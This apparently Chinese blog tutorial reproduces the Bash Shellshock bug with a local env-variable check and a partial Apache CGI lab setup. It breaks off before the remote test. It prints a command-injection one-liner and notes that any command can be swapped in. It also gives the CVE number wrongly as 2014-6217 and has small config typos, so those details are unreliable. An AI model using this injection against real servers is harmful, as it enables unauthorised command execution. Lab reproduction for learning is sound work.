Bash Shellshock(cve-2014-6217)漏洞简单复现
Bash Shellshock(cve-2014-6217)漏洞简单复现
关于这个漏洞,我主要讲两个验证方法。一是本地验证方法,二是远程模拟验证方法。
1:本地验证
直接在shell中输入执行以下命令: env x=’(){ :;}; echo Vulnerable CVE-2014-6217 ’ bash -c “echo test”
如果显示echo Vulnerable CVE-2014-6217,就证明系统存在该漏洞。可将"echo Vulnerable CVE-2014-6217"改为任意命令进行执行。
验证成功!
2:远程模拟验证
1:安装apache2
使用命令: sudo apt-get install apache2
2:打开配置文件#sudo vi /etc/apache2/sites-enabled/000-default
修改配置语句:
DocumentsRoot /var/www/html
ScriptAlias /cgi-bin/ /var/www/html/cgi-bin/
3:编辑服务端测试文件:
#sudo vi /var/www/html/cgi-bin/test.sh(记得提前创建好路径)
内容:
#!/bin/bash
echo"Content-type:text/html"
echo""
4:重启服务
#sudo /etc/init.d/apache2 restart
5:进行测试